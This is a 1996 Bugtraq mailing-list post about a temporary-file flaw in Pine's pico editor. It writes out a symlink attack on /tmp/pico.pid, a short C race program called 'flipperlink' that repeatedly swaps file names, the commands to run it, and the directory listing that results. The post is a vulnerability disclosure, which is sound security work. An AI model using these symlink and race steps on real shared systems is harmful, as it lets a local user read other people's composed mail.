[3345] in bugtraq
Re: message rejected: Re: [linux-security] Pine security problem.
daemon@ATHENA.MIT.EDU (Pascal A. Dupuis)
Fri Sep 13 14:24:10 1996
Date: Fri, 13 Sep 1996 10:07:19 +0200
Reply-To: "Pascal A. Dupuis" <dupuis@lei.ucl.ac.be>
From: "Pascal A. Dupuis" <dupuis@lei.ucl.ac.be>
X-To: Rogier Wolff <wolff@rosie.et.tudelft.nl>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To: <199609122339.BAA02443@cave.et.tudelft.nl>
Hello,
I got a bunch of messages in reply to Re: Pine Security problem. Here is a
summary:
First of all, the exploit is straightforward with Linux :
ln -s /tmp/hacker.tmp /tmp/pico.pid; touch /tmp/hacker.tmp;
the /tmp/hacker.tmp must be rw-rw-rw- (mode 666), and everybody could
have a look on composed message.
I tried also Rogier Wolff suggestion about the flipperlink program ,
running at high processor load to have swapping (compiling the kernel)
>main (int argc,char **argv)
> {
> while (1) {
> rename (argv[1],argv[2]);
> rename (argv[2],argv[1]);
> }
> }
and run it with :
> cd /tmp
> ln -s hacker.tmp pico.pid
> flipperlink pico.pid bla
Once the alternate editor is invoqued, the hacker.tmp, if not
existing, is created 600, owned by the pine user. At this time, the toggle
stop working as long as the alternate editor is working.
the amasing fact is the ownership :
ls -l /tmp
lrwxrwxrwx 1 hacker grp 10 Sep 13 09:49 bla ->hacker.tmp
-rw------- 1 dupuis grp 3042 Sep 13 09:50 hacker.tmp
hacker> more blah
hacker>blah : permission denied
It is thus the ownership of the destination file which is used.
Greetings
Pascal A. Dupuis
--
Information Science is emerging from the Prehistoric Ages, but its
language still reflects it : gnu, hurd, awk, nroff, ls, ar, chmod, ...
